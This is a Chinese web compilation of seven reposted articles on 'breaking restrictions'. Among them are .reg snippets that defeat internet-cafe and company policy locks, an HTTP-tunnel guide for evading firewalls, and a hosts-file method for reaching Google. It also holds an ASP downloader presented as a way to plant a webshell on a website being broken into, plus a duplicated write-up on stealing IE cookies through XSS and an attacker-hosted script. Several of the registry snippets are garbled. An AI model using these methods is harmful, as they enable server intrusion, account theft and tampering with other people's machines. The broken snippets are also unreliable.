“不吃牛肉面小姐”通过精心收集,向本站投稿了7篇编写记事本突破本地限制的方法,下面是小编为大家整理后的编写记事本突破本地限制的方法,仅供大家参考借鉴,希望大家喜欢!
- 目录
篇1:编写记事本突破本地限制的方法
我们经常都会遇见各种限制,特别是在网吧,今天,就教大家用记事本来突破各类限制,因为目前的电脑上还没有限制用户不能编写记事本的哈(至少我还没碰见过....可能是很少用别人的机器上网吧-_-!)
下面就介绍几种编写记事本突破本地限制的方法....
1,利用记事本编写突破本地IE隐藏行为(主要用于网吧)
很多网吧为了安全都会隐藏IE浏览器,因为IE浏览器和微软的操作系统紧密结合,用户可以通过IE浏览起访问本地硬盘,查看资源......
在不借助第三方软件的情况下我们可以通过编写记事本的方式来突破
现在的网吧好多都是用美萍安全卫士来进行管理的,而在美萍下的桌面实际是虚拟的,只是美萍指定的一个目录,原桌面被隐藏了.
我们需要对原桌面进行刷新..在遇见鼠标右键被禁止的我们可以使用WIN+D组合键来刷新桌面,此时像我的电脑这些就会一直存在与桌面上了.
打开我的电脑,在工具栏中点向上,就可以把桌面以窗口的形式打开了,一般来说硬盘都是被屏蔽掉的,我们打开的时候会什么都看不见.别管他,新建一个记事本,编写
REHEDIT4
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
“NoRun”=dword 00000000
保存该文件,文件名可自定,只要后缀名为.reg就可以.导入它,等再次开机时,打开“我的电脑”就可以看到被网管屏蔽的IE中文件和工具菜单了^_^
2,突破被阻止使用“运行”的方法
同样是新建文本
REHEDIT4
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
“Norun=dword 00000000
保存为reg文件就然后执行就可以了哈..
3,对于不让我们修改注册表的电脑可以在记事本里编写
REHEDIT4
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System
“DisableRegistrTool”=dword 00000000d
保存为reg文件就然后执行.
4.突破禁止使用软件
我电脑出了点故障,拿去维修了,这台电脑是维修公司临时给的.
本来写第三条就想打住的了,现在居然发现这维修公司的电脑连WinZip这种压缩工具软件都不让用,郁闷.看我突破他....
编写
REHEDIT4
HKEY_LOCAL_MACHINE/Software/Mpsoft/Smeu
“unzipped”=dword 00000000
保存为reg文件执行....OK
篇2:Http通道突破防火墙限制方法
不少公司的防火墙作了较为严格的限制,以至于很多网络服务如QQ、MSN都无法运行,如果你还能够打开网页,那么,使用Http通道软件可以让你突破限制,可以在现有的网络条件中使用任何网络服务,使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对方通讯,当封装的数据包到达目的地时,再将数据包还原,并将还原后的数据包转交到相应的服务器上。
www.http-tunnel.com是一个专业提供Http通道服务的公司,通过他们的在线Tunnel Server,局域网内的用户可以使用被防火墙所屏蔽的ICQ、E-mail、PC Anywhere、MSN、 QQ、Napster等软件。
使用Http-tunnel的Tunnel Server必须使用Http-tunnel的客户端程序Http-Tunnel Client,Http-Tunnel Client的免费版本允许40Kb/秒的数据转发服务。
一、程序安装和设置
1.运行下载的安装程序,安装过程比较简单一路Next即可完成。
2.安装完成后,会弹出Configuration(配置)窗口,设置本机的Internet连接,有三个选项:
a) Auto detected(自动检测):你果你不知道你的机器连接,可以选择这个。
b) No Proxy,only a firewall(直接上网,有防火墙):使用局域网和直接上网的用户选这个,
c) Specify Proxy(指定代理服务器):如果你使用代理服务器上网,选这个,同时你还必须输入代理服务器的地址和端口,如果需要用户名和密码还需要一并输入。
3.设置好连接,可以单击Test(测试)按钮,测试一下,如果看到Test successful(测试成功)的提示,就代表你设置的已经完成。
4.程序正常运行后,可以将它最小化,它会在任务栏的提示区内生成一个下图标,单击可还原。
二、设置QQ访问
由于QQ对外访问使用的端口是4000,所以网络管理员通常通过限制端口的使用来限制QQ的访问,下面介绍一下如何设置QQ通过http-tunnel访问Internet。
1.打开QQ,单击QQ菜单按钮,选择系统参数。
2.在弹出的QQ参数设置窗口中,选择网络设置。
3.勾上使用代理服务器。
4.输入代理服务器地址:127.0.0.1,端口号:1080。
5.确定,关闭所有窗口,重新登录即可使用QQ了。
三、设置MSN访问
MSN的访问设置可QQ差不多,不过http-tunnel支持MSN要比QQ好得多,设置步骤如下:
1.选择工具菜单的选项。
2.选择连接标签。
3.勾上我使用代理服务器。
4.类型选择SOCKS4,服务器中输入127.0.0.1,端口号1080。
5.确定,关闭所有窗口,重新登录即可使用MSN了。
篇3:突破一流拦截 上传限制的方法
在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截
这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法.这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中.好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件复制代码
代码如下:<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,“www.jb51.net/1.txt”,False
xPost.Send
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“1.asp”),2
set sGet = nothing
set sPOST = nothing
%>
篇4:突破MSN五表情限制的方法
1.首先安装msn6.10211china.msn.com
图1MSNMessenger
2.然后安装msnplus的最新版www.msgplus.net/
图2安装msnplus
切记不要选择sponsor这个广告程序
图3拒绝安装广告程序
3.最后安装msnplus插件wtbwplugv1.0www.ox.compsoc.net/~wtbw/wtbwplug.zip
图4安装插件
4.重新打开msn后,表情已经自动突破了5个表情的上限,而且还可以发任意大小的表情,不再受到以前19象素大小的限制了,
突破MSN五表情限制的方法
,
图5超过限制OK
篇5:突破IE安全限制获取iframe子框架内的本地cookie
作者:aullik5今天这篇主要是要讲以下这么几件事情:1. iframe的限制2. 突破iframe获取本地cookie的思路3. 利用Cross Iframe. Trick突破iframe安全限制我的测试环境是: IE 7 (7.0.5730.13)以下所有的内容全部经过我在IE7中测试,是真实有效的
作者:aullik5今天这篇主要是要讲以下这么几件事情:
1. iframe的限制
2. 突破iframe获取本地cookie的思路
3. 利用Cross Iframe. Trick突破iframe安全限制
我的测试环境是: IE 7 (7.0.5730.13)
以下所有的内容全部经过我在IE7中测试,是真实有效的结果,
Iframe的限制:
因为iframe这个玩意比较特殊,所以浏览器对它一般都有一些限制。
首先父窗口不能控制子窗口的js,只能读取一些对象;子窗口也不能使用父窗口的js,也只能读部分对象,更多的比如document啥的都限制了。
关系如下:
- iframe's should not be able to view content/cookies from another domain
- iframe. children CAN view certain properties and execute certain behaviors
- parent.window.blur
- parent.window.opener
- parent.window.length
- others
- iframe. children CAN redirect the parent frame. to a new location (great for phishing)
- parent.location.href
- parent.window.location对于有些利用子窗口执行父窗口js的方法是限制的
比如,在子窗口里可以这么使用:
parent.location.href=“www.sohu.com”;
上面的语句将把父窗口重新定义到sohu的网站去.
但是如果想执行js,或者是读取document对象,则会被拒绝访问
parent.location.href=new String(“javascript.:alert(document.cookie)”);
parent.location.href=new String(“javascript.:alert(1)”);
像这两条都会被拒绝。
对于iframe,Firefox3 居然是不限制本地cookie发送的!也就是说,在Firefox环境里,使用iframe包含一个远程页面,是会将保存在本地的cookie发送出去的,这使得CSRF会非常之方便,
但是IE不同,对于IE环境中,img和iframe标签都只能发送session cookie,无法发送本地cookie,所以很多时候CSRF会失败,这也会给XSS带来很大的麻烦,比如会使得XSRF更困难一些。
鉴于Firefox一点挑战都没有,所以今天主要研究的对象是IE。
在IE环境下,程序员们一般都是使用P3P协议来获取跨域cookie的,但是P3P也要求我们改写HTTP头,更麻烦,在这里,我纯粹使用一些脚本的技巧来突破这些限制。
突破IFRAME限制的思路:(以下都是在IE环境中)
由于页面里的iframe都是发送的session cookie,所以子框架页面里本身是只有一个session cookie的,我们无法通过在子框架里执行js的方法来获取本地cookie,无中生有的事情是干不出来的。
了解这一原理后,思路就很明确了:想办法新起一个不受限制的窗口,从而获取本地cookie。
具体来说,有这么两个办法:
1、使用window.open打开一个新窗口
2、回到父窗口,让其打开一个新窗口
在子框架中,使用window.open确实可以发送本地cookie,但是问题是浏览器一般会限制页面弹窗口,会被拦截,所以这个方法比较~~,不是个好办法。
而第二个办法,回到父窗口去打开新窗口,就涉及到一个突破iframe执行脚本的问题,而这个问题在我的前一篇Cross Iframe. Trick 里已经解决了,所以我们的方法就呼之欲出了。
利用Cross Iframe. Trick突破iframe限制获取子框架cookie:
Cross Iframe的最大贡献就在于他可以绕过前面提到的iframe的限制,在父域或者子框架里获取对象,执行脚本。
当一个页面很难突破时,如果他包含了一个存在弱点的iframe页面,则可能会带来灾难性的结果。
我相信真正精通脚本攻击的人是能够看到它的用处和优势的。
环境如下:(绑定127.0.0.1 www.baidu.com)
www.a.com/1.html 是我们要攻击的页面,它包含了一个存在弱点的iframe,用户只会去浏览这个页面
www.baidu.com/3.html 是我们已经控制的页面,他作为一个iframe被1.html所包含。在这里是iframe. proxy
www.a.com/4.html 是www.a.com上的一个存在XSS漏洞的页面,一般情况下用户不会去访问它!
www.b.com/4.js 这是攻击者自己的服务器上的一个恶意脚本,将被XSS攻击远程载入4.html中。
由于用户只会浏览www.a.com/1.html,所以我们要通过脚本攻击,从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie。
上一页12 下一页
篇6:教你如何突破IE安全限制获取iframe子框架内的本地cookie(图)
我的测试环境是: IE 7 (7.0.5730.13)以下所有的内容全部经过我在IE7中测试,是真实有效的结果,Iframe的限制:因为iframe这个玩意比较特殊,所以浏览器对它一般都有一些限制。首先父窗口不能控制子窗口的js,只能读取一些对象;子窗口也不能使用父窗
我的测试环境是: IE 7 (7.0.5730.13)以下所有的内容全部经过我在IE7中测试,是真实有效的结果。
Iframe的限制:
因为iframe这个玩意比较特殊,所以浏览器对它一般都有一些限制。
首先父窗口不能控制子窗口的js,只能读取一些对象;子窗口也不能使用父窗口的js,也只能读部分对象,更多的比如document啥的都限制了。
关系如下:
- iframe's should not be able to view content/cookies from another domain
- iframe. children CAN view certain properties and execute certain behaviors
- parent.window.blur
- parent.window.opener
- parent.window.length
- others
- iframe. children CAN redirect the parent frame. to a new location (great for phishing)
- parent.location.href
- parent.window.location
对于有些利用子窗口执行父窗口js的方法是限制的
比如,在子窗口里可以这么使用:
parent.location.href=“www.sohu.com”;
上面的语句将把父窗口重新定义到sohu的网站去.
但是如果想执行js,或者是读取document对象,则会被拒绝访问
parent.location.href=new String(“javascript.:alert(document.cookie)”);
parent.location.href=new String(“javascript.:alert(1)”);
像这两条都会被拒绝。
对于iframe,Firefox3 居然是不限制本地cookie发送的!也就是说,在Firefox环境里,使用iframe包含一个远程页面,是会将保存在本地的cookie发送出去的,这使得CSRF会非常之方便。
但是IE不同,对于IE环境中,img和iframe标签都只能发送session cookie,无法发送本地cookie,所以很多时候CSRF会失败,这也会给XSS带来很大的麻烦,比如会使得XSRF更困难一些。
鉴于Firefox一点挑战都没有,所以今天主要研究的对象是IE。
在IE环境下,程序员们一般都是使用P3P协议来获取跨域cookie的,但是P3P也要求我们改写HTTP头,更麻烦,在这里,我纯粹使用一些脚本的技巧来突破这些限制。
突破IFRAME限制的思路:(以下都是在IE环境中)
由于页面里的iframe都是发送的session cookie,所以子框架页面里本身是只有一个session cookie的,我们无法通过在子框架里执行js的方法来获取本地cookie,无中生有的事情是干不出来的。
了解这一原理后,思路就很明确了:想办法新起一个不受限制的窗口,从而获取本地cookie。
具体来说,有这么两个办法:
1、使用window.open打开一个新窗口
2、回到父窗口,让其打开一个新窗口
在子框架中,使用window.open()确实可以发送本地cookie,但是问题是浏览器一般会限制页面弹窗口,会被拦截,所以这个方法比较~~,不是个好办法。
而第二个办法,回到父窗口去打开新窗口,就涉及到一个突破iframe执行脚本的问题,而这个问题在我的前一篇Cross Iframe. Trick 里已经解决了,所以我们的方法就呼之欲出了。
利用Cross Iframe. Trick突破iframe限制获取子框架cookie:
Cross Iframe的最大贡献就在于他可以绕过前面提到的iframe的限制,在父域或者子框架里获取对象,执行脚本。
当一个页面很难突破时,如果他包含了一个存在弱点的iframe页面,则可能会带来灾难性的结果。
我相信真正精通脚本攻击的人是能够看到它的用处和优势的。
环境如下:(绑定127.0.0.1 www.baidu.com)
www.a.com/1.html 是我们要攻击的页面,它包含了一个存在弱点的iframe,用户只会去浏览这个页面
www.baidu.com/3.html 是我们已经控制的页面,他作为一个iframe被1.html所包含,
在这里是iframe. proxy
www.a.com/4.html 是www.a.com上的一个存在XSS漏洞的页面,一般情况下用户不会去访问它!
www.b.com/4.js 这是攻击者自己的服务器上的一个恶意脚本,将被XSS攻击远程载入4.html中。
由于用户只会浏览www.a.com/1.html,所以我们要通过脚本攻击,从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie。
www.a.com/1.html的代码如下:
---------------------------------- 我是聪明的分割线 -------------------------------------------
---------------------------------- 我是聪明的分割线 -------------------------------------------
它包含了一个iframe页面
www.baidu.com/3.html 的代码为:
---------------------------------- 我是聪明的分割线 -------------------------------------------
---------------------------------- 我是聪明的分割线 -------------------------------------------
3.html是我们的iframe. proxy,利用它来完成在www.a.com里执行脚本的工作。
www.a.com/4.html 的代码为:
---------------------------------- 我是聪明的分割线 -------------------------------------------
This is 4.html!
---------------------------------- 我是聪明的分割线 -------------------------------------------
www.b.com/4.js 的代码为:
---------------------------------- 我是聪明的分割线 -------------------------------------------
alert(“4.js is loaded!”);
top.tt1('\\'>
---------------------------------- 我是聪明的分割线 -------------------------------------------
4.js才是我们真正利用XSS漏洞和Cross Iframe. Trick来新起一个窗口,从而获取本地cookie的方法。
www.baidu.com/2.html的代码很简单,他的作用是查看当前的cookie:
---------------------------------- 我是聪明的分割线 -------------------------------------------
---------------------------------- 我是聪明的分割线 -------------------------------------------
在这里攻击流程是这样的:
www.a.com/1.html ----iframe---->www.baidu.com/3.html ----动态iframe--->www.a.com/4.html 的XSS漏洞 ------>在www.a.com域中远程加载www.b.com/4.js
篇7:谷歌搜索引擎被屏蔽之本地突破访问谷歌方法网络技巧
第一种方法就是通过谷歌浏览器自带的QUIC协议来突破,
1.在Google新版的Chrome浏览器中,支持QUIC协议,在 Chrome 浏览器中打开“实验性功能”页面(chrome://flags/),
启用“实验性 QUIC 协议”和“经由实验性 QUIC 协议发出的 HTTPS 请求”,重启浏览器后可以正常登陆 Google 相关服务(被DNS污染的除外)。
对于被DNS污染的Google服务,还需要设置Hosts的IP,然后通过HTTPS才能访问。
QUIC协议的原理介绍:
TCP、UDP都是计算机网络通信层的主要协议。TCP是面向连接的,更强调的是传输的可靠性,UDP是面向无连接的,也即在通信双方进行数据交换之前,无需建立连接,只要知道对方地址即可发送数据,由于UDP协议是无连接方式的协议,所以它的效率高,速度快,占资源少。
为了集合两者的优点,谷歌公司研制了一种UDP通信的改进版——Quick UDP Internet Connections(QUIC),快速UDP互联网连接。
第二种方法就是通过修改本地hosts的方法来通过谷歌镜像源来访问、
2.修改hosts文件来访问Google仍然是一个免费简单的可行方案,今天我就介绍一下我通常用到的快速找到Google可用hosts的方法。对于HTTP方式的网址,通常只是封了其80端口,检测方法一般是,“开始”-“运行”-“cmd”,然后输入 ping 目标IP地址,如果不返回“请求超时”的错误信息,通常就是可用的IP地址。
(1)寻找可用IP地址
通常Google的服务器有很多个,一般都会有访问加速功能,就是说对于不同国家会解析出访问速度最快的网址,因此通常中国访问的IP被封后,其他国家访问的IP还能用,因此只要使用一个Ping工具找出这个服务域名对应的多个ip地址,然后在Hosts文件里添加即可。
这个Ping工具实际是一个站长工具,主要用于测试一个网站在不同国家或地区的访问速度,很多网站都提供,一些cdn测试网站也有,百度或Google一下“ping检测”或“ping tools”就能找到很多。
(2)检测可用IP地址
现在,我们找到了一堆IP地址,到底那个是可用的IP地址呢,这里又分为两种情况:
1、HTTP的服务和网址
通常Google的服务器有很多个,一般都会有访问加速功能,就是说对于不同国家会解析出访问速度最快的网址,因此通常中国访问的IP被封后,其他国家访问的IP还能用,因此只要使用一个Ping工具找出这个服务域名对应的多个ip地址,然后在Hosts文件里添加即可,
这个Ping工具实际是一个站长工具,主要用于测试一个网站在不同国家或地区的访问速度,很多网站都提供,一些cdn测试网站也有,百度或Google一下“ping检测”或“ping tools”就能找到很多。
2、HTTPS的服务和网址
对于HTTPS方式的网址,不能用ping来检测,而要用telnet来检测,通过这个命令连接目标IP的443端口,能连接上的即为可用ip,具体方法是,“开始”-“运行”-“cmd”,然后输入 telnet 目标IP地址 443,如果没有返回“连接失败”提示,而是出现一个黑屏,则是可用IP地址,将其添加到hosts文件即可。
对于Windows7用户来说,需要现在“控制面板”-“程序”-“打开或关闭Windows功能”里选择打开“Telnet客户端”才能用Telnet。
添加Hosts文件
这里我为大家提供一个目前可用的谷歌镜像源IP203.208.46.208
找到可用IP后,就可以添加这个IP到Hosts文件里了,先关闭“电脑管家”、“360安全卫士”这类工具,然后编辑
C:\\Windows\\System32\\drivers\\etc\\hosts文件,在文件结尾添加一行“可用IP地址 目标域名”即可。
例如:203.208.46.208 www.google.com.hk之后如果“电脑管家”、“360安全卫士”等工具检测hosts文件提供风险,只需信任这个文件并将其添加到白名单即可。
添加后的测试结果 如下图
经过这些操作,就可以手动找出最新的Google可用IP地址。 现在,在中国正常地使用Google终于成为了一门技术。
说到最后: 谷歌,这个世界流量最大的搜索引擎到底会不会终于从中国消失呢! 时间会给我们答案。。
★ 个人简历编写
★ 如何编写大事记
★ 怎么突破英语听力
★ 突破作文
★ 限制的近义词
★ 本地民风民俗作文
编写记事本突破本地限制的方法(精选7篇)




